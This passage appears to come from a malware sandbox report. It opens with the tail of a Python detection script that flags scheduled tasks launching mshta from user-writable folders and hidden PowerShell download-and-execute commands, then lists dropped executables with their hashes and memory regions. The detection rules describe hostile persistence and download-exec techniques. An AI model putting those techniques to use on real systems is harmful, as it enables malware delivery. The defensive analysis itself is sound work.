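        if name == "schtasks.exe" and "/create" in e.cmdline.lower():
            m = RE_TASK_ACTION.search(e.cmdline)
            action = m.group(1) if m else ""
            if "mshta" in action.lower() and RE_USER_WRITABLE.search(action):
                findings.append({"rule": "schtasks_mshta_userdir", "pid": e.pid, "action": action})
        elif name == "powershell.exe":
            url = RE_DOWNLOADFILE.search(e.cmdline)
            if url and RE_HIDDEN.search(e.cmdline) and "start-process" in e.cmdline.lower():
                parent = by_pid.get(e.ppid)
                findings.append({
                    "rule": "hidden_powershell_download_exec",
                    "pid": e.pid,
                    "url": url.group(1),
                    "drop_path": predicted_drop_path(e.cmdline),
                    "parent_is_mshta": parent is not None and basename(parent.image) == "mshta.exe",
                })
    return findings


if __name__ == "__main__":
    for finding in analyze(EVENTS):
        print(finding)
```

The cmd.exe wrappers are deliberately not flagged; the rule fires on the schtasks.exe child, which is the process that actually registers the task. Note that the report reuses PIDs (1864, 2780 and 2800 each appear twice), so a production version of this must key the parent lookup on a process GUID or on (PID, creation time) rather than on PID alone.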

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

      Filesize

      71KB

      MD5

      83142242e97b8953c386f988aa694e4a

      SHA1

      833ed12fc15b356136dcdd27c61a50f59c5c7d50

      SHA256

      d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755

      SHA512

      bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

    • C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe

      Filesize

      350KB

      MD5

      b60779fb424958088a559fdfd6f535c2

      SHA1

      bcea427b20d2f55c6372772668c1d6818c7328c9

      SHA256

      098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221

      SHA512

      c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f

    • C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe

      Filesize

      1.8MB

      MD5

      9dadf2f796cd4500647ab74f072fd519

      SHA1

      92b6c95a6ed1e120488bd28ac74274e874f6e740

      SHA256

      e5f73330a51f34981205988aa6bbd82797a8d2d1e2ef1a605aa90baa3a806d76

      SHA512

      fd9f14321805f6bfef8fa2c81e11c5c96a7246acbc70fb9c86e6a59d9e650353231ddca0c30d3c0db69cbee1c219c5ca416a6f9f691edeebbec114e997fc574d

    • C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe

      Filesize

      7.8MB

      MD5

      001d7acad697c62d8a2bd742c4955c26

      SHA1

      840216756261f1369511b1fd112576b3543508f7

      SHA256

      de53f6f359af6ccc361faf2aa74690c9575b987a01f1250a6eb042cf9d4ea4af

      SHA512

      f06039d1d7ad28a04877e4eabb6fb7a5137a0040b8c316bee502bce6c68058bfe62db9480674bb69c9aeabae34304adeeff86dc3a8427929d00a842d2f2e80eb

    • C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe

      Filesize

      2.9MB

      MD5

      30c1a6337089e68b975438caebc8f497

      SHA1

      2cf2324672cf72b9bc1869633f3bf6904bb61011

      SHA256

      db15e9537c66a283d59f45e262018c45ef3fc5416b292b2c5269f4f9a4f10017

      SHA512

      be8f68704c02b41bddbd94382d30197b13f68c783d041a077b35579c1a791a82bc68d99f828eb3b09c859237256791dd2d1c39eacf4e09ec2bd3f2aa6b54a484

    • C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe

      Filesize

      361KB

      MD5

      2bb133c52b30e2b6b3608fdc5e7d7a22

      SHA1

      fcb19512b31d9ece1bbe637fe18f8caf257f0a00

      SHA256

      b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630

      SHA512

      73229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f

    • C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe

      Filesize

      12.4MB

      MD5

      7ff72f21d83d3abdc706781fb3224111

      SHA1

      3bfbe059b8e491bde4919fb29afa84d4ea1c0fa8

      SHA256

      0c54843666a464f185c97a7693a91eb328827a900717e414357b897bd2630fea

      SHA512

      dbb3c7b618bc2c80dae90ff902100d3902ddffe5705cf0c648b8b3f702fd8814b9cf66490e3260e09d36c1ce57bfc05d3f9bb0fc089c5ec7c553eb8a94d3320d

    • C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe

      Filesize

      1.7MB

      MD5

      971c0e70de5bb3de0c9911cf96d11743

      SHA1

      43badfc19a7e07671817cf05b39bc28a6c22e122

      SHA256

      67c9bb968cd0de2bfb2c24b00cfb2b98ac7403135ea47d98961652518584e45d

      SHA512

      a46523d8c71c0df25a043e2250ee1b6792e147314ec2097870a7972c892fd1a2022994f10823dadf54f161d11e808251b85a18efb9db9450d97af4b2f173f3c2

    • C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe

      Filesize

      2.0MB

      MD5

      6006ae409307acc35ca6d0926b0f8685

      SHA1

      abd6c5a44730270ae9f2fce698c0f5d2594eac2f

      SHA256

      a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b

      SHA512

      b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718

    • C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe

      Filesize

      909KB

      MD5

      3babce4f85902c7bcfde22e222508c4e

      SHA1

      4898ae5c075322b47ab2f512b5463ee6116d98f7

      SHA256

      06b678b55cb81e6999b25903def2ac02336dc6c9ff3cd6afdaafffd55e2e5302

      SHA512

      f8687729c8931579f8120f6451f669726f115123c10a7c5ce6d9a24746940153efcf7e33b719e8f543f9b4316db485633272943f462bf948b4044f234795d629

    • C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe

      Filesize

      615KB

      MD5

      19668940080169c70b830bed8c390783

      SHA1

      5e6b72e52abc7d221d512111e39cbdd3f2ad40c1

      SHA256

      cdbc641b8c23b5699f899b408394ecfc946af9ac7a38c5d44c78a4a938e7b02c

      SHA512

      c322eba01ff4544b8077ec400f15ecffd3b66f89e0e0e26946224771c1ffb9c687ff4adc2e0a5e6b119766b3c8300971cfc2c990ff48346d9d3d514ab5d4bed2

    • C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe

      Filesize

      7.6MB

      MD5

      e82c4c3f7a2994eeecc1f81a5e4a4180

      SHA1

      660820f778073332dcd5ec446d2fcf00de887abd

      SHA256

      11eec5d71c7fadae9d7176448d8fff3de44ec8d3b4df86f0eca59e06adf202d3

      SHA512

      4d3e42e68b9fa6330edfee677ad55ae24964c33d6fd2d25ba6c2876d80f8d9cbc999c6e27192ce58a45559d00b3c0bc71ddbee1ad8d6fd7083b705ef5cf84d76

    • C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe

      Filesize

      450KB

      MD5

      02579a797e919dcaf5758fbcbe34b093

      SHA1

      7668fff0888f4c7ad7a83b24f8c6d4009c10e534

      SHA256

      0a63a310dfc4ce680c96f72f5b9c9559f9e6d9c3d99f48c8782ee43c56a8728c

      SHA512

      2b99b620ca06f03a1924c0ab2feef96142df6ff16558d30c37e8b3e5602e5d5b2ecd4e7bd3b4499ef64a0eb32cb136821442e79b3aa66caf42467c749116e5f5

    • C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe

      Filesize

      6.8MB

      MD5

      dab2bc3868e73dd0aab2a5b4853d9583

      SHA1

      3dadfc676570fc26fc2406d948f7a6d4834a6e2c

      SHA256

      388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb

      SHA512

      3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8

    • C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe

      Filesize

      429KB

      MD5

      22892b8303fa56f4b584a04c09d508d8

      SHA1

      e1d65daaf338663006014f7d86eea5aebf142134

      SHA256

      87618787e1032bbf6a6ca8b3388ea3803be20a49e4afaba1df38a6116085062f

      SHA512

      852dcc1470f33bc601a814f61a37c1f5a10071ff3354f101be0ef9aa5ac62b4433a732d02acd4247c2a1819fef9adef7dd6722ee8eb9e8501bac033eb877c744

    • C:\Users\Admin\AppData\Local\Temp\10097710101\6eaad46262.exe

      Filesize

      938KB

      MD5

      da3a7687a7f215bbbc93fe62e0afa1ea

      SHA1

      ee56166cf511655e53b4bbd796247c9810037476

      SHA256

      231b4d3c2b060b288878d7c28fb536c22f3844a54bf003eaf3b0da4808ffd63d

      SHA512

      374c8ecdfbd339f0064c9c799ff428086e49e82c053ddcb25b3a84c850ad6c1fa009f8833804330e8c16c489088496dbbdc74f6ee6970be4f0e2e996ed2cd75a

    • C:\Users\Admin\AppData\Local\Temp\10097720121\am_no.cmd

      Filesize

      1KB

      MD5

      cedac8d9ac1fbd8d4cfc76ebe20d37f9

      SHA1

      b0db8b540841091f32a91fd8b7abcd81d9632802

      SHA256

      5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b

      SHA512

      ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

    • C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe

      Filesize

      2.8MB

      MD5

      77c8daa35f8fa536031bca64e567107b

      SHA1

      0524411a8f30adf2b1d95c071eaa4ff900c9b702

      SHA256

      d0c87ac8cb00fd5d5aedbdeb6c747327969ae5ba1d031b902697ac5a9aa5fb02

      SHA512

      dbcc132580a51abc93a36cf1303a5139937a3e556902c28f516185d940b7a49217f4dd50ccad92a763b5e1e9563b963bed2d713fb45497c56f93bba59cb0bedd

    • C:\Users\Admin\AppData\Local\Temp\TarAF0B.tmp

      Filesize

      183KB

      MD5

      109cab5505f5e065b63d01361467a83b

      SHA1

      4ed78955b9272a9ed689b51bf2bf4a86a25e53fc

      SHA256

      ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673

      SHA512

      753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

    • C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta

      Filesize

      717B

      MD5

      42bcecbc4a9d0c9e72120f0a60102147

      SHA1

      026d375bc2a684027fb8532af83ce2991509e1f1

      SHA256

      303332f5d6160d3604c26f26245225fcdb46887b69f741b346b35948cbb1b23b

      SHA512

      d6438e784658959e18c3b867bac7e406131011dc5146db4ce9781469e4cabee4630dd6b79106b7b507fe03e748a51516855dcae59f4ac0b2ab29416f339c4498

    • C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe

      Filesize

      1.6MB

      MD5

      f53198e8b444658cf7134f5ccb466a98

      SHA1

      0283e56ed7201eecfc7dad30cc6f3f30d677be66

      SHA256

      936004bbb9d3c4763c0e36cc887b21315ae6c2d55c366cb3b3390d480b827107

      SHA512

      ee40f63f7b75cc1b55d11c56c25086d2d66ae86a3f65326d5a75cf0f2fac94ebee622cd4844b4f6468b2bfd011ab80558f41e1b62d2a7864b0ce7f61d3bdcf09

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YYMSUYSSQ3CAKYLT6H5V.temp

      Filesize

      7KB

      MD5

      29c618e15d21bc79ac7d3b3af1291cef

      SHA1

      372437f7e7ffa08dc419ec8caef214063e257107

      SHA256

      1562cc7e2bb4afa829250ff827198b5490f32ea8da9264a08c8e38fe66ce9e45

      SHA512

      26450f65deed7c371c78c4864b7f4571e8f354c258469c2a8cd6c107e5a5dd8f1e0d06bbf1cb3b6af616d8efb8fe7efac479ec5204d68a26da9fa91526a740ef

    • \Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE

      Filesize

      1.8MB

      MD5

      3147e388f1f2ad94f26aee55a4267b8c

      SHA1

      b3dfd5bb152b1b8e338586ea1e2d240cde6503b3

      SHA256

      49ac9312c49ff99d5af392d17450747038fcbd6f319ebf981916fcf44120aa2b

      SHA512

      720b48b08c502c153ecdaeb6fa8a2e374187a71655a88493dc70b266fe16ce88d342aaceefbe5a35fa9db93911510baee7fb578786e44ae6da637369f56443e9

    • \Windows\Temp\{E3B35B7F-5DCC-4ADC-B8CE-BC66E8720123}\.ba\Quadrisyllable.dll

      Filesize

      168KB

      MD5

      a1e561bc201a14277dfc3bf20d1a6cd7

      SHA1

      1895fd97fb75ad6b59fc6d2222cf36b7dc608b29

      SHA256

      7ae39cb5cd14a875af3e43df4a309d6a7a44c0339c413bf21b0300c84e35b66c

      SHA512

      aaa4e7350094dc7574e5f18ce619f48a45062674353f0f2a340a1fea0055c7961a9b257455d8ea877d739635e3444df08f049484f48fa9729d8fb1667374cf3c

    • \Windows\Temp\{E3B35B7F-5DCC-4ADC-B8CE-BC66E8720123}\.ba\WiseTurbo.exe

      Filesize

      8.7MB

      MD5

      1f166f5c76eb155d44dd1bf160f37a6a

      SHA1

      cd6f7aa931d3193023f2e23a1f2716516ca3708c

      SHA256

      2d13424b09ba004135a26ccd60b64cdd6917d80ce43070cbc114569eae608588

      SHA512

      38ad8f1308fe1aae3ddf7dbc3b1c5442663571137390b3e31e2527b8fec70e7266b06df295df0c411fcc500424022f274fd467d36040def2e1a4feff88c749b7

    • \Windows\Temp\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe

      Filesize

      7.7MB

      MD5

      eff9e9d84badf4b9d4c73155d743b756

      SHA1

      fd0ad0c927617a3f7b7e1df2f5726259034586af

      SHA256

      d61ef1bfa73bd5b013066d86f1c41e33bb396fc547cf5ab7191f56cc7b463aad

      SHA512

      0006273c86e8130e06e705a2be46c3433c0d1b34463123354c1857ebf88503d6e7e90602dc40960351baa03155074f8c5834b251be9da90fd95b10e498a98a19

    • memory/880-446-0x000000013F390000-0x000000013F42F000-memory.dmp

      Filesize

      636KB

    • memory/880-440-0x000000013F390000-0x000000013F42F000-memory.dmp

      Filesize

      636KB

    • memory/1208-441-0x0000000003E30000-0x0000000003ED5000-memory.dmp

      Filesize

      660KB

    • memory/1208-447-0x0000000003E30000-0x0000000003ED5000-memory.dmp

      Filesize

      660KB

    • memory/1208-443-0x0000000003E30000-0x0000000003ED5000-memory.dmp

      Filesize

      660KB

    • memory/1580-452-0x0000000000400000-0x0000000000429000-memory.dmp

      Filesize

      164KB

    • memory/1696-744-0x0000000001170000-0x000000000160F000-memory.dmp

      Filesize

      4.6MB

    • memory/1824-592-0x0000000000970000-0x000000000105E000-memory.dmp

      Filesize

      6.9MB

    • memory/1824-615-0x0000000000970000-0x000000000105E000-memory.dmp

      Filesize

      6.9MB

    • memory/1864-12-0x00000000064C0000-0x000000000695F000-memory.dmp

      Filesize

      4.6MB

    • memory/1864-14-0x00000000064C0000-0x000000000695F000-memory.dmp

      Filesize

      4.6MB

    • memory/1864-176-0x0000000000400000-0x0000000000D48000-memory.dmp

      Filesize

      9.3MB

    • memory/1936-426-0x0000000006A00000-0x0000000006E9B000-memory.dmp

      Filesize

      4.6MB

    • memory/1936-590-0x0000000006A00000-0x00000000070EE000-memory.dmp

      Filesize

      6.9MB

    • memory/1936-404-0x0000000006A00000-0x0000000006E9B000-memory.dmp

      Filesize

      4.6MB

    • memory/1936-192-0x00000000063E0000-0x00000000066F1000-memory.dmp

      Filesize

      3.1MB

    • memory/1936-197-0x0000000000F00000-0x000000000139F000-memory.dmp

      Filesize

      4.6MB

    • memory/1936-831-0x0000000000F00000-0x000000000139F000-memory.dmp

      Filesize

      4.6MB

    • memory/1936-217-0x00000000063E0000-0x00000000066F1000-memory.dmp

      Filesize

      3.1MB

    • memory/1936-218-0x00000000063E0000-0x00000000066F1000-memory.dmp

      Filesize

      3.1MB

    • memory/1936-449-0x0000000005400000-0x000000000549F000-memory.dmp

      Filesize

      636KB

    • memory/1936-220-0x0000000000F00000-0x000000000139F000-memory.dmp

      Filesize

      4.6MB

    • memory/1936-124-0x0000000000F00000-0x000000000139F000-memory.dmp

      Filesize

      4.6MB

    • memory/1936-614-0x0000000000F00000-0x000000000139F000-memory.dmp

      Filesize

      4.6MB

    • memory/1936-362-0x0000000000F00000-0x000000000139F000-memory.dmp

      Filesize

      4.6MB

    • memory/1936-125-0x0000000006A00000-0x0000000006EAC000-memory.dmp

      Filesize

      4.7MB

    • memory/1936-376-0x0000000000F00000-0x000000000139F000-memory.dmp

      Filesize

      4.6MB

    • memory/1936-32-0x0000000000F00000-0x000000000139F000-memory.dmp

      Filesize

      4.6MB

    • memory/1936-591-0x0000000006A00000-0x00000000070EE000-memory.dmp

      Filesize

      6.9MB

    • memory/1936-450-0x0000000005400000-0x000000000549F000-memory.dmp

      Filesize

      636KB

    • memory/1936-448-0x0000000000F00000-0x000000000139F000-memory.dmp

      Filesize

      4.6MB

    • memory/1936-438-0x0000000005400000-0x000000000549F000-memory.dmp

      Filesize

      636KB

    • memory/1936-577-0x0000000000F00000-0x000000000139F000-memory.dmp

      Filesize

      4.6MB

    • memory/1936-411-0x0000000000F00000-0x000000000139F000-memory.dmp

      Filesize

      4.6MB

    • memory/1936-554-0x0000000000F00000-0x000000000139F000-memory.dmp

      Filesize

      4.6MB

    • memory/1936-76-0x0000000000F00000-0x000000000139F000-memory.dmp

      Filesize

      4.6MB

    • memory/1936-425-0x0000000006A00000-0x0000000006E9B000-memory.dmp

      Filesize

      4.6MB

    • memory/1936-94-0x0000000006A00000-0x0000000006EAC000-memory.dmp

      Filesize

      4.7MB

    • memory/1936-77-0x0000000000F00000-0x000000000139F000-memory.dmp

      Filesize

      4.6MB

    • memory/1936-93-0x0000000006A00000-0x0000000006EAC000-memory.dmp

      Filesize

      4.7MB

    • memory/1936-439-0x0000000005400000-0x000000000549F000-memory.dmp

      Filesize

      636KB

    • memory/1936-403-0x0000000006A00000-0x0000000006E9B000-memory.dmp

      Filesize

      4.6MB

    • memory/1936-153-0x0000000000F00000-0x000000000139F000-memory.dmp

      Filesize

      4.6MB

    • memory/1936-453-0x0000000000F00000-0x000000000139F000-memory.dmp

      Filesize

      4.6MB

    • memory/1936-191-0x00000000063E0000-0x00000000066F1000-memory.dmp

      Filesize

      3.1MB

    • memory/1936-126-0x0000000006A00000-0x0000000006EAC000-memory.dmp

      Filesize

      4.7MB

    • memory/1952-194-0x00000000000F0000-0x0000000000401000-memory.dmp

      Filesize

      3.1MB

    • memory/1952-219-0x00000000000F0000-0x0000000000401000-memory.dmp

      Filesize

      3.1MB

    • memory/2196-129-0x0000000000260000-0x000000000070C000-memory.dmp

      Filesize

      4.7MB

    • memory/2196-95-0x0000000000260000-0x000000000070C000-memory.dmp

      Filesize

      4.7MB

    • memory/2196-127-0x0000000000260000-0x000000000070C000-memory.dmp

      Filesize

      4.7MB

    • memory/2300-568-0x00000000041E0000-0x0000000004603000-memory.dmp

      Filesize

      4.1MB

    • memory/2300-594-0x00000000041E0000-0x0000000004603000-memory.dmp

      Filesize

      4.1MB

    • memory/2300-593-0x00000000041E0000-0x0000000004603000-memory.dmp

      Filesize

      4.1MB

    • memory/2300-567-0x00000000041E0000-0x0000000004603000-memory.dmp

      Filesize

      4.1MB

    • memory/2336-572-0x0000000000170000-0x00000000001D5000-memory.dmp

      Filesize

      404KB

    • memory/2372-759-0x0000000000400000-0x0000000000823000-memory.dmp

      Filesize

      4.1MB

    • memory/2372-569-0x0000000000400000-0x0000000000823000-memory.dmp

      Filesize

      4.1MB

    • memory/2372-596-0x0000000000400000-0x0000000000823000-memory.dmp

      Filesize

      4.1MB

    • memory/2372-595-0x0000000000400000-0x0000000000823000-memory.dmp

      Filesize

      4.1MB

    • memory/2460-55-0x0000000000400000-0x0000000000429000-memory.dmp

      Filesize

      164KB

    • memory/2460-69-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

      Filesize

      4KB

    • memory/2460-53-0x0000000000400000-0x0000000000429000-memory.dmp

      Filesize

      164KB

    • memory/2460-65-0x0000000000400000-0x0000000000429000-memory.dmp

      Filesize

      164KB

    • memory/2460-57-0x0000000000400000-0x0000000000429000-memory.dmp

      Filesize

      164KB

    • memory/2460-59-0x0000000000400000-0x0000000000429000-memory.dmp

      Filesize

      164KB

    • memory/2460-63-0x0000000000400000-0x0000000000429000-memory.dmp

      Filesize

      164KB

    • memory/2460-72-0x0000000000400000-0x0000000000429000-memory.dmp

      Filesize

      164KB

    • memory/2460-61-0x0000000000400000-0x0000000000429000-memory.dmp

      Filesize

      164KB

    • memory/2460-68-0x0000000000400000-0x0000000000429000-memory.dmp

      Filesize

      164KB

    • memory/2460-70-0x0000000000400000-0x0000000000429000-memory.dmp

      Filesize

      164KB

    • memory/2780-31-0x0000000006D40000-0x00000000071DF000-memory.dmp

      Filesize

      4.6MB

    • memory/2780-29-0x0000000000CC0000-0x000000000115F000-memory.dmp

      Filesize

      4.6MB

    • memory/2780-15-0x0000000000CC0000-0x000000000115F000-memory.dmp

      Filesize

      4.6MB

    • memory/2808-388-0x000000013FC30000-0x000000013FDDE000-memory.dmp

      Filesize

      1.7MB

    • memory/2824-406-0x00000000010F0000-0x000000000158B000-memory.dmp

      Filesize

      4.6MB

    • memory/2824-424-0x00000000010F0000-0x000000000158B000-memory.dmp

      Filesize

      4.6MB

    • memory/2936-50-0x00000000011D0000-0x0000000001230000-memory.dmp

      Filesize

      384KB